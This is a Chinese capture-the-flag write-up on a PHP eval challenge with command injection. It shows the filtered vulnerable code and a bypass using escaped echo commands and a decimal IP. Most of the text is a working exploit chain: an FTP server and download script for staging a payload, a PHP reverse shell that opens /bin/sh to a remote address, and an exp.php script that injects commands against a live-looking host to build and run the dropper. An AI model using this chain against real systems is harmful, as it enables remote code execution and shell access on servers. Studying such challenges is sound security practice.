利用exp命令注入

 代码如下

<?php
// Connect to localhost:8888 to get the flag
if($_GET['👉🏻'] == '👌🏻') die(phpinfo());
$_ = $_GET['⁣'];
highlight_file(__FILE__);

if(preg_match("/[\w]{4,}/is",$_) || preg_match("/\[|\"|'|\||\^|~|\./is",$_)) // mình thích thì mình block hoy 👯
     die("🙅"); // 4cm is too much
eval(substr($_,0,30));

　　

没有参数 、目测是不可见字符、抓个包就出来了%e2%81%a3

三个\w绕过的黑科技,还限制30个字符，以及过滤一些符号

看了看phpinfo发现shell_exec没有ban，目测命令执行

发现

sh -c "ec\ho 1"

　

ip 用 十进制形式

bash -i 反弹失败 用 php 来反弹

脚本

ip2dec.sh

ip2dec () {
    local a b c d ip=$@
        IFS=. read -r a b c d <<< "$ip"
        printf '%d\n' "$((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))"
}

　ftpd.py

from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
authorizer = DummyAuthorizer()
authorizer.add_user('a', 'a', '/root/', perm='elradfmw')
handler = FTPHandler
handler.authorizer = authorizer
server = FTPServer(('0.0.0.0', 21), handler)
server.serve_forever()

ftpdown.sh

　　

ftp -niv<<!
open [ip] [port]
user a a
mget x
bye
!

　php_shell.php

<?php $sock=fsockopen("xxx.xxx.xxx.xxx",23333);exec("/bin/sh -i <&3 >&3 2>&3");

exp.php

<?php
error_reporting(0);

function fuck1($u){
    fuck("`{$u}`;");
}
function fuck($u){
    $u = urlencode($u);
    $a = file_get_contents("http://l4w.pw/%F0%9F%A4%94/?%e2%81%a3={$u}");
    $x = explode("</code>", $a);
    echo $x[1];
}
fuck1("ec\ho cd /tmp >/tmp/0");
fuck1("ec\ho ftp \\\\\\ >>/tmp/0");
fuck1("ec\ho -niv\\<\\<! >>/tmp/0");
fuck1("ec\ho o\\pen \\\\\\ >>/tmp/0");
fuck1("ec\ho my\\\\\\ >>/tmp/0");
fuck1("ec\ho ip\\\\\\ >>/tmp/0");
fuck1("ec\ho ip\\\\\\ >>/tmp/0");
fuck1("ec\ho ip port >>/tmp/0");
fuck1("ec\ho u\\ser a a >>/tmp/0");
fuck1("ec\ho m\\get \\\\\\ >>/tmp/0");
fuck1("ec\ho x >>/tmp/0");
fuck1("ec\ho bye >>/tmp/0");
fuck1("ec\ho ! >>/tmp/0");
fuck1("php -f /tmp/x");
fuck1("rm /tmp/0");

　　

　

 

 

 

参考：https://www.virzz.com/2018/02/17/a_funny_command_injection.html